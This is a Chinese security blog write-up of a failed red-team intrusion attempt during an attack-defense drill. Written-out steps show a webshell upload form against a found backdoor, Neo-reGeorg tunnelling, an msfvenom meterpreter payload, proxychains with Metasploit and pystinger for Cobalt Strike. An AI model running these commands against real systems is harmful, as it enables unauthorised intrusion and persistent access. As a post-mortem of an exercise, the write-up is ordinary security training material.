记一次失败的打点

admin
admin
admin
138717
文章
114
评论
2022年7月8日18:33:47评论63 views字数 891阅读2分58秒阅读模式

记一次失败的打点


背景

在某次攻防演练的晚上,大佬给我一个网站,说有一个RCE漏洞打一下试试,抱着试试就逝世的心态,进行了打点行动。


上传webshell

在web目录发现了一个已存在木马xx.jsp

<%if(request.getParameter("f".getBytes());%>< a href="One_OK"></ a>

利用已经存在的上传后门,构建一个html表单来上传我们的自己木马

<form action="http://xx.x.x.x:8080/scdc/xx.jsp?f=fuckjp.jsp" method="post">      <textarea name=t cols=120 rows=10 width=45>your code</textarea><BR><center><br>    <input type=submit value="提交">  </form>

目标不出网,无法外联


neoreg

还原大致流程

生成neoreg

py -2 neoreg.py generate -k password

记一次失败的打点

上传&验证

py -2 neoreg.py -k password -u http://192.168.11.132/3.php`

记一次失败的打点

msf上线

msfvenom -p windows/x64/meterpreter/bind_tcp  LPORT=9001 -f exe -o reverse.exe
gedit /etc/proxychains4.conf 


记一次失败的打点


proxychains4 msfconsole


记一次失败的打点


记一次失败的打点



CS上线

pystinger

蚁剑上传proxy.phpstinger_server.exe并执行  start stinger_server.exe


记一次失败的打点


攻击机执行

stinger_client.exe -w http://192.168.11.132/proxy.php -l 127.0.0.1 -p 60000

记一次失败的打点

设置监听

记一次失败的打点

上线

记一次失败的打点



结束语

最后不幸被蓝队发现,痛失权限,打点失败。


往期回顾

01

微信小程序抓包之路

02


 Brida配合Burp模块

03

信息收集思路&工具分享



原文始发于微信公众号(雷石安全实验室):记一次失败的打点

免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2022年7月8日18:33:47
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   记一次失败的打点https://cn-sec.com/archives/1166947.html
                  免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉.

发表评论

匿名网友 填写信息